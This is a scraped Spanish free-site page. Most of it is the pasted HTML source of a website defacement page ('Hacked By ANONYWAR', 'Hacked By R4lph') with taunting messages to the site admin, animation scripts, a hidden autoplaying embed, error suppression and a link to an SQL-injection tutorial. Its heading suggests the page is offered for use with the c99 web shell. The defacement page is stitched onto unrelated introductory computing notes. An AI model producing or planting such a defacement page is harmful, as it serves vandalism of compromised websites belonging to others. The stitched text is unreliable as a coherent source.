index para sell c99
<html>
 
<head>
<noframes></noframes><noscript></noscript><!-- --><script type="text/javascript" src="http://www.freewebs.com/p.js"></script><script language="JavaScript1.2">
// *******************************************************************
// HACKED BY ANONYWAR. 
// visiten mi pagina http://hackersdelaweb.es.tl/como-hacer-una-sql-injection.htm      
// espero no molestar!!! xD 
// Script written for Internet Explorer 4.0+.
// ******************************************************************* 
var message="Hacked By ANONYWAR"    
var message=message+"          " 
i="0"         
var temptitle=""
var speed="350"
function titler(){
if (!document.all&&!document.getElementById)
return
document.title=temptitle+message.charAt(i)
temptitle=temptitle+message.charAt(i)
i++
if(i==message.length)
{
i="0"
temptitle=""
}
setTimeout("titler()",speed)
}
window.onload=titler
</script>
 
<title>Hacked By ANONYWAR</title>
 
<meta http-equiv=Content-Type content="text/html; charset=windows-1254">
 
<script type="text/javascript">
 
TypingText = function(element, interval, cursor, finishedCallback) {
 
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
 
this.running = true; // Never run.
 
return;
 
}
 
this.element = element;
 
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
 
this.interval = (typeof interval == "undefined" ? 20 : interval);
 
this.origText = this.element.innerHTML;
 
this.unparsedOrigText = this.origText;
 
this.cursor = (cursor ? cursor : "");
 
this.currentText = "";
 
this.currentChar = 0;
 
this.element.typingText = this;
 
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
 
TypingText.all.push(this);
 
this.running = false;
 
this.inTag = false;
 
this.tagBuffer = "";
 
this.inHTMLEntity = false;
 
this.HTMLEntityBuffer = "";
 
}
 
TypingText.all = new Array();
 
TypingText.currentIndex = 0;
 
TypingText.runAll = function() {
 
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
 
}
 
TypingText.prototype.run = function() {
 
if(this.running) return;
 
if(typeof this.origText == "undefined") {
 
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
 
return;
 
}
 
if(this.currentText == "") this.element.innerHTML = "";
 
//  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
 
if(this.currentChar < this.origText.length) {
 
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
 
this.tagBuffer = "<";
 
this.inTag = true;
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
 
this.tagBuffer += ">";
 
this.inTag = false;
 
this.currentText += this.tagBuffer;
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.inTag) {
 
this.tagBuffer += this.origText.charAt(this.currentChar);
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
 
this.HTMLEntityBuffer = "&";
 
this.inHTMLEntity = true;
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
 
this.HTMLEntityBuffer += ";";
 
this.inHTMLEntity = false;
 
this.currentText += this.HTMLEntityBuffer;
 
this.currentChar++;
 
this.run();
 
return;
 
} else if(this.inHTMLEntity) {
 
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
 
this.currentChar++;
 
this.run();
 
return;
 
} else {
 
this.currentText += this.origText.charAt(this.currentChar);
 
}
 
this.element.innerHTML = this.currentText;
 
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
 
this.currentChar++;
 
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
 
} else {
 
this.currentText = "";
 
this.currentChar = 0;
 
this.running = false;
 
this.finishedCallback();
 
}
 
}
 
 
 
function ClearError() {return true;}
 
window.onerror = ClearError;
 
 
 
farbbibliothek = new Array(); 
 
farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 
 
farbbibliothek[1] = new Array("#FF0000","#00ffff","#FF0000","#FF0000"); 
 
farbbibliothek[2] = new Array("#00ffff","#FF0000","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff","#00ffff"); 
 
farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00ffff","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); 
 
farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); 
 
farbbibliothek[5] = new Array("#000000","#000000","#000000","#00ffff","#00ffff","#00ffff"); 
 
farbbibliothek[6] = new Array("#0000FF","#FFFF00"); 
 
farben = farbbibliothek[4];
 
function farbschrift() {
 
for(var i=0 ; i<Buchstabe.length; i++)  { 
 
document.all["a"+i].style.color=farben[i]; 
 
}
 
farbverlauf(); 
 
}
 
function string2array(text) {
 
Buchstabe = new Array(); 
 
while(farben.length<text.length) { 
 
farben = farben.concat(farben); 
 
}
 
k=0; 
 
while(k<=text.length) {
 
Buchstabe[k] = text.charAt(k); 
 
k++; 
 
}
 
}
 
function divserzeugen() {
 
for(var i=0 ; i<Buchstabe.length; i++) {
 
document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); 
 
 
farbschrift(); 
 
}
 
var a=1; 
 
function farbverlauf() {
 
for(var i=0 ; i<farben.length; i++) {
 
farben[i-1]=farben[i]; 
 
}
 
farben[farben.length-1]=farben[-1]; 
 
setTimeout("farbschrift()",30); 
 
 
// 
 
var farbsatz=1; 
 
function farbtauscher() { 
 
farben = farbbibliothek[farbsatz]; 
 
while(farben.length<text.length) { 
 
farben = farben.concat(farben); 
 
 
farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); 
 
}
 
 
 
 
 
 
var rows=1; // must be an odd number
 
var speed=10; // lower is faster
 
var reveal=0; // between 0 and 2 only. The higher, the faster the word appears
 
var effectalign="center" //enter "center" to center it.
 
 
/***********************************************
 
* The Matrix Text Effect- by Richard Womersley (http://www.mf2fm.co.uk/rv)
 
* This notice must stay intact for use
 
* Visit http://www.dynamicdrive.com/ for full source code
 
***********************************************/
 
 
var w3c=document.getElementById && !window.opera;;
 
var ie45=document.all && !window.opera;
 
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
 
var m_coch=new Array();
 
var m_copo=new Array();
 
function matrix() {
 
if (!w3c && !ie45) return
 
var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
 
ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
 
ma_txt=" "+ma_txt+" ";
 
columns=ma_txt.length;
 
if (w3c) {
 
while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
 
ma_tab=document.createElement("table");
 
ma_tab.setAttribute("border", 0);
 
ma_tab.setAttribute("align", effectalign);
 
ma_tab.style.backgroundColor="#000009";
 
ma_bod=document.createElement("tbody");
 
for (x=0; x<rows; x++) {
 
ma_row=document.createElement("tr");
 
for (y=0; y<columns; y++) {
 
matemp=document.createElement("td");
 
matemp.setAttribute("id", "Mx"+x+"y"+y);
 
matemp.className="matrix";
 
matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
 
ma_row.appendChild(matemp);
 
}
 
ma_bod.appendChild(ma_row);
 
}
 
ma_tab.appendChild(ma_bod);
 
matrix.appendChild(ma_tab);
 
} else {
 
ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
 
for (var x=0; x<rows; x++) {
 
ma_tab+='<t'+'r>';
 
for (var y=0; y<columns; y++) {
 
ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'">&nbsp;</'+'td>';
 
}
 
ma_tab+='</'+'tr>';
 
}
 
ma_tab+='</'+'table>';
 
matrix.innerHTML=ma_tab;
 
}
 
ma_cho=ma_txt;
 
for (x=0; x<columns; x++) {
 
ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
 
m_copo[x]=0;
 
}
 
ma_bod=setInterval("mytricks()", speed);
 
}
 
 
function mytricks() {
 
x=0;
 
for (y=0; y<columns; y++) {
 
x=x+(m_copo[y]==100);
 
ma_row=m_copo[y]%100;
 
if (ma_row && m_copo[y]<100) {
 
if (ma_row<rows+1) {
 
if (w3c) {
 
matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
 
matemp.firstChild.nodeValue=m_coch[y];
 
}
 
else {
 
matemp=document.all["Mx"+(ma_row-1)+"y"+y];
 
matemp.innerHTML=m_coch[y];
 
}
 
matemp.style.color="#83ffff";
 
matemp.style.fontWeight="bold";
 
}
 
if (ma_row>1 && ma_row<rows+2) {
 
matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
 
matemp.style.fontWeight="normal";
 
matemp.style.color="#4cd2d4";
 
}
 
if (ma_row>2) {
 
matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
 
matemp.style.color="#41b7b8";
 
}
 
if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
 
else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
 
else if (ma_row<rows+2) m_copo[y]++;
 
else if (m_copo[y]<100) m_copo[y]=0;
 
}
 
else if (Math.random()>0.9 && m_copo[y]<100) {
 
m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
 
m_copo[y]++;
 
}
 
}
 
if (x==columns) clearInterval(ma_bod);
 
}
 
 
function zoomer(ycol) {
 
var mtmp, mtem, ytmp;
 
if (m_copo[ycol]==Math.floor(rows/2)+1) {
 
for (ytmp=0; ytmp<rows; ytmp++) {
 
if (w3c) {
 
mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
 
mtmp.firstChild.nodeValue=m_coch[ycol];
 
}
 
else {
 
mtmp=document.all["Mx"+ytmp+"y"+ycol];
 
mtmp.innerHTML=m_coch[ycol];
 
}
 
mtmp.style.color="#83c3ff";
 
mtmp.style.fontWeight="bold";
 
}
 
if (Math.random()<reveal) {
 
mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
 
ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
 
}
 
if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
 
m_copo[ycol]+=199;
 
setTimeout("zoomer("+ycol+")", speed);
 
}
 
else if (m_copo[ycol]>200) {
 
if (w3c) {
 
mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
 
mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
 
}
 
else {
 
mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
 
mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
 
}
 
mtmp.style.fontWeight="normal";
 
mtem.style.fontWeight="normal";
 
setTimeout("zoomer("+ycol+")", speed);
 
}
 
else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
 
if (m_copo[ycol]>100 && m_copo[ycol]<200) {
 
if (w3c) {
 
mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
 
mtmp.firstChild.nodeValue=String.fromCharCode(160);
 
mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
 
mtem.firstChild.nodeValue=String.fromCharCode(160);
 
}
 
else {
 
mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
 
mtmp.innerHTML=String.fromCharCode(160);
 
mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
 
mtem.innerHTML=String.fromCharCode(160);
 
}
 
setTimeout("zoomer("+ycol+")", speed);
 
}
 
}
 
 
setTimeout('matrix()', 1);
 
col=0;
 
function fadein() {
 
document.getElementById("fade1").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade2").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade3").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade4").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade5").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade6").style.color="rgb(" + col + ",0,0)";
 
col+=5;
 
if(col<255) setTimeout('fadein()', 1);
 
if(col==255) setTimeout('fadeout()', 1);
 
}
 
 
function fadeout(){
 
document.getElementById("fade1").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade2").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade3").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade4").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade5").style.color="rgb(" + col + ",0,0)";
 
document.getElementById("fade6").style.color="rgb(" + col + ",0,0)";
 
col-=5;
 
if(col>0) setTimeout('fadeout()', 1);
 
if(col==0) setTimeout('fadein()', 1);
 
}
 
 
setTimeout('fadein()', 1);
 
</script>
 
<style type="text/css">body, a, a:hover {cursor: url(http://generadors.es/defacing/negro.cur), progress;}</style>
<style>
 
 body {
 
 
 
    background: black url("http://i.imgur.com/ShCmH.gif");
 
 
 
    background-repeat: repeat;
 
 
 
    background-position: center;
 
 
 
    background-attachment: fixed;
 
 
 
    }
 
td{font-family: verdana; font-size: 9pt; color: #00ff00}
 
a{font-family: verdana; font-size: 12pt; color: #00ff00}
 
</style>
 
</head>
 
<body>
 
 
 
<div align="center">
 
<font face="Times New Roman"><em style="font-style: normal"><span class="">
 
 
 
<span style="font-weight:normal; text-shadow:white 0px 0px 6px; color:red">
 
<strong>
 
<h1><center>
 
<script type="text/javascript">
 
setInterval("farbtauscher()",2000);
 
text= "Hacked By R4lph™";
 
string2array(text);
 
divserzeugen(); 
 
</script>
 
</center></h1>
 
<h1><FONT COLOR="lime">@ANONYWAR1</font></h1>
 
<h2>
<p align="center" id="note"><font color="white">-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</font><br /> <font color="red">             esto no es un delito esto es arte XD..!!                      <br />                      Sorry Amin   :<br />                         You are hacked...!! !!!<br />                    <font color="white">-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</font><br /><font color="red">GreeTz -> To All HackerZ + @ANONYWAR1 los espero en https://twitter.com/ANONYWAR1 <br />                      <font color="white">-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</font></p> <center><img src=https://twimg0-a.akamaihd.net/profile_images/1990265118/R4LPH_reasonably_small.jpg></center>
 
 
 
<div align="center">
 
<script type="text/javascript">
 
new TypingText(document.getElementById("note"), 50, function(i){
 
var ar = new Array("_"," ","_","_"); return " " + ar[i.length % ar.length]; });
 
//Type out examples:
 
TypingText.runAll();
 
</script>  
 
</div>
 
<div id=matrix> <font color=#00FF00> YOU PAGE, IS MY PAGE, >yo veo los pequeños detalles que ustedes no ven : ANONYWAR </div><br /><br />
<center><a href="https://twitter.com/ANONYWAR1" class="twitter-follow-button" data-show-count="true" data-lang="es" data-size="large">Seguir @ANONYWAR1</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></center>
<embed src="http://www.youtube.com/watch?v=HSswCnv1jeM&feature=related&autoplay=1"
 
 
       
 
 
 
 
 
 
 
      type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
 
<!-- --><script type="text/javascript" src="http://static.websimages.com/static/global/js/webs/usersites/escort.js"></script><script type="text/javascript">if(typeof(urchinTracker)=='function'){_uacct="UA-230305-2";_udn="none";_uff=false;urchinTracker();}</script></body>
 
</html>
Facebook botón-like
 
HACKED BY ANONYWAR
 
HACKED BY ANONYWAR
Introuccion a la informatica
 
1. La historia de la computadora.
2. Generación de las computadoras
3. Procesar datos
4. Informática
5. Computadoras. Software y Hardware
6. C.P.U.
7. Memorias Principales
8. Periféricos de entrada y salida. Ranuras de Expansión
9. Funcionamiento de la PC.
10. Bits y Bytes
11. Medidas de almacenamiento
12. Sistemas Operativos
13. Sistemas operativos actuales
14. Tecnologías futuras
15. Virus
Definición de software y hardware - ¿Qué es software y qué es hardware?
 
Software es todo el conjunto intangible de datos y programas de la computadora.
Hardware son los dispositivos físicos como la placa base, la CPU o el monitor.
La interacción entre el Software y el Hardware hace operativa la máquina, es decir, el Software envía instrucciones al Hardware haciendo posible su funcionamiento.
Placa Base o Placa Madre
 
funcionamiento se encuentran en la Placa Base (también conocida como Placa Madre), que es una placa de circuito impreso que aloja a la Unidad Central de Procesamiento (CPU) o microprocesador, Chipset (circuito integrado auxiliar), Memoria RAM, BIOS o Flash-ROM, etc., además de comunicarlos entre sí.
 
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis